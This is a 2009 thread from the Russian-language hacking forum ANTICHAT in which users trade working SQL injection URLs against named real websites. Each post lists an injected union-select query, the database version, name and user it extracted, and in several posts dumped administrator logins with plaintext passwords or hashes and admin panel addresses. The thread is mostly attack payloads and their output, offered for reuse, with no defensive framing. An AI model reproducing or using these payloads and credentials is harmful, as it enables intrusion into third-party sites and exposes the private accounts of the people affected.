ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
02.04.2009, 18:34
|
|
Новичок
Регистрация: 02.11.2008
Сообщений: 25
Провел на форуме:
147543
Репутация:
55
|
|
Арт-ателье "Костюмер" + информационный портал "Костюмер"
http://www.kostumer.ru/biograph_SB.php3?m=6&id=-1+union+select+1,2,3,4/*
Database Version: 4.1.9-log
|
|
|
02.04.2009, 19:08
|
|
Banned
Регистрация: 11.03.2009
Сообщений: 214
Провел на форуме:
914766
Репутация:
317
|
|
Код:
http://breadmaker.karasik.org/viewRecipe.php?ID=-10+union+select+1,unhex(hex(concat_ws(0xa,username,user_password))),3,4,5,6,7,8,9+from+karasik_breadboard.phpbb_users+limit+1,1--+
db: 5.0.67-msl-icd1-log
name_db: karasik_breadmaker
user: karasik@localhost
table: phpbb_users
database:karasik_breadboard
login: karasik
pass: kkkVVV
+limit+x,x--+
--------------------------------------------------
Код:
http://prazdnik.com.ua/index.php?id=54&pid=-35180'+union+select+concat_ws(0x3a,version(),database(),user()),2--+
db: 5.0.44
name_db: newprazdnik
user: u_newprazdni@localhost
http://prazdnik.com.ua/admin/
log: prazdnik
pass: 12345
Последний раз редактировалось farex; 02.04.2009 в 19:52..
|
|
|
|
02.04.2009, 20:08
|
|
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181
Репутация:
688
|
|
Код:
http://www.npo-saturn.ru/!new/?act=gm_look&id=-1238156655+uNioN+SeLecT+1,concat_ws(0x3a,version(),da tabase(),user()),3,4,5,6,7,8,9,10,11,12--
Database Version : 5.0.67
Database name : saturn
User name : saturn@zvm11.host.ru
адм :
Код:
http://www.npo-saturn.ru/!new/?act=gm_look&id=-1238156655+uNioN+SeLecT+1,concat_ws(0x3a,name,passwd),3,4,5,6,7,8,9,10,11,12+from+s_ users+limit+0,1--
Код:
sokolov_ка:wJwVyTMy_spr
moder:mashaalenamoders
саму админку не нашел  |
|
|
|
02.04.2009, 21:00
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134
Репутация:
519
|
|
Код:
http://www.hdtinfo.com/news/read.php?id=-1+union+all+select+0,concat_ws(version(),user(),database()),2,3,4--
юзер/версия/бд:
Код:
news@localhost5.0.51a-logmmnews
|
|
|
|
02.04.2009, 23:14
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740
Репутация:
912
|
|
http://dornerworks.com/?p=news&id=-1+union+select+1,2,3--
Database Version: 5.0.67-community
Database name: pigvomit_dnwwebsite
User name: pigvomit_dorner@localhost
http://egyco-egypt.com/English/newsdetail.php?ID=-15+union+select+1,2,3,4--
Database Version: 5.0.77-community
Database name: egycoeg_egyco
User name: egycoeg_egyco@localhost
Login: egico
Pass:egico1
http://www.line.com.ua/magazin.php?id=-1+union+select+1,2,3--
Database Version: 5.0.51a-community
Database name: abook_line
User name: abook_linecom@localhost
Около 350 юзеров! Выводить всех юзеров не стал =)
http://www.mistelle.fr/news.php?id=-1+union+select+1,2,3,4,5,6,7--
Database Version: 5.0.68-log
Database name: mistelle
User name: mistelle@10.0.75.182
Юзеры: http://www.mistelle.fr/news.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,password,use rname),6,7+from+pun_users--
http://www.geotek.co.uk/site/scripts/news.php?id=-1+union+select+1,2,3,4,5,6--
Database Version: 4.0.24_Debian-10sarge2
Database name: geotekmain
User name: geotekmain@localhost
http://www.ecop.org.ph/news.php?id=-99+union+select+1,2,3,4,5--
Database Version: 4.1.22-standard-log
Database name: ecoporg_db
User name: ecoporg_user@localhost
http://windsurfing-by.org/news.php?id=-1+union+select+1,2,3,4,5,6,7,8--
Database Version: 5.0.32-Debian_7etch6-log
Database name: windsurf_com
User name: windsurf_user@localhost
http://www.dflvwclub.de/cars.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20--
Database Version: 5032-debian_7etch8-log
Database name: aa34
User name: aa34@localhost
Login: admin
Pass: d9c4b5ac3b13e92e26b4e025586d8a8d : dflit
Выводить юзеров с форума с таблы phorum_users
Последний раз редактировалось .:[melkiy]:.; 02.04.2009 в 23:33..
Причина: Добавил
|
|
|
|
03.04.2009, 13:39
|
|
Banned
Регистрация: 11.03.2009
Сообщений: 214
Провел на форуме:
914766
Репутация:
317
|
|
<<ЙА-Xxa - Официальный сайт Рашида Нугманова>>
Код:
http://www.yahha.com/article.php?sid=-145+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12,13--+
db: 5.0.67-community
name_db: yahha_mpn
user: yahha_admin@localhost
table:mpn_authors , db: yahha_mpn
log: RN
pass: xer0mem
Это владелитц сайта (не админ, вход прямо с главной страницы)
-------------------------------------------------------------
limit+186,1--+
table: mpn_users
name: Андрей Дамер
log: damer
pass: 250676
+limit+X,x--+
все юзверы..........
-------------------------------------------------------------- |
|
|
|
03.04.2009, 14:39
|
|
Участник форума
Регистрация: 22.10.2007
Сообщений: 119
Провел на форуме:
598447
Репутация:
123
|
|
На боян проверено в SQL Injections [AntiBoyan] CheckeR
Pr 4
http://campisis.us/locdetail.php?id=2 %26%26 1%3D2 UNION SELECT 1,CONCAT(0x6467797436,CONCAT_WS(0x203A20,VERSION() ,DATABASE(),USER()),0x3566646B68),3,4,5,6,7,8,9,10 ,11,12 %23
VERSION(),DATABASE(),USER()
4.1.22-max-log : campisis : campisis@72.167.131.114
==
PR3
http://hamercaz.com/hamercaz/site/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,version(),12--
5.0.22
==
|
|
|
|
03.04.2009, 18:45
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740
Репутация:
912
|
|
http://www.interbridge.ee/?lang=ru&what=news&id=-1+union+select+1,2,3--
Database Version: 5.0.32-Debian_7etch6-log
Database name: interbridge
User name: interbridge@localhost
http://www.spurway.ca/news&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--
Database Version: 5.0.22
Database name: pg_org_spurway
User name: spurway@localhost
http://www.fourwinds-rv.com/?page=news&id=-1+union+select+1,2,3,4,5--
Database Version: 4.1.7-log
Database name: fourwinds-rv
User name: databaseadmin@elk1.elkhart.net
Есть доступ к mysql.user
13 юзеров
Имхо, это админ! Пасс рута не выводит((
Login: adminatcomp
Pass:07d8ece224cf7ece : ???
Бильярд по-киевски
http://kiev.duplet.com.ua/?R=arhive&id=-5+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22--
Database Version: 5.0.67-community-log
Database name: dupletc_kiev
User name: dupletc_kadm@localhost
Последний раз редактировалось .:[melkiy]:.; 03.04.2009 в 20:11..
|
|
|
|
03.04.2009, 19:39
|
|
Banned
Регистрация: 11.03.2009
Сообщений: 214
Провел на форуме:
914766
Репутация:
317
|
|
<<Официальный сайт, футбольного клуба "КаМаЗ" >>
Код:
http://www.fckamaz.ru/pages/news.php?id=-472+union+select+1,concat_ws(0x3a,table_name,table_schema),3,4,5,6,7,8+from+information_schema.columns+where+column_name+like+0x70617373776f7264--+
db: 5.0.75
name_db: fckamazru
user: fckamazru@78.108.81.121
-------------------
http://www.fckamaz.ru/admin
-------------------
table: wp_users , db: fckamazru_wordpress
log: admin
pass: 03ecc478f8949ec82c3b4a6fcecd0305 
-------------------
table: users
log: Спарк
pass: sdfsdt34t34
+limit+x,x--+
-------------------
table: users2007
log: Спарк - (Администратор сайта)
pass: nw21
+limit+x,x--+
--------------------------------------------
--------------------------------------------
Код:
http://www.krainamriy.com/news.php?id=-46+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11--+
db: 4.1.22-log
name_db: krainamriy
user: krainamriy@localhost
Последний раз редактировалось farex; 03.04.2009 в 20:48..
|
|
|
|
03.04.2009, 21:03
|
|
Участник форума
Регистрация: 22.10.2007
Сообщений: 119
Провел на форуме:
598447
Репутация:
123
|
|
PR 7
http://www.icimod.org/enews/custom.page.php?id=-1+union+select+1,version()--
4.1.22-standard
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для .:[melkiy]:.](/avatars/avatar74910.jpg?1204932){kind=avatar}
![Аватар для .:[melkiy]:.](/avatars/avatar74910.jpg?1205774){kind=avatar}
Похожие темы
Линейный вид
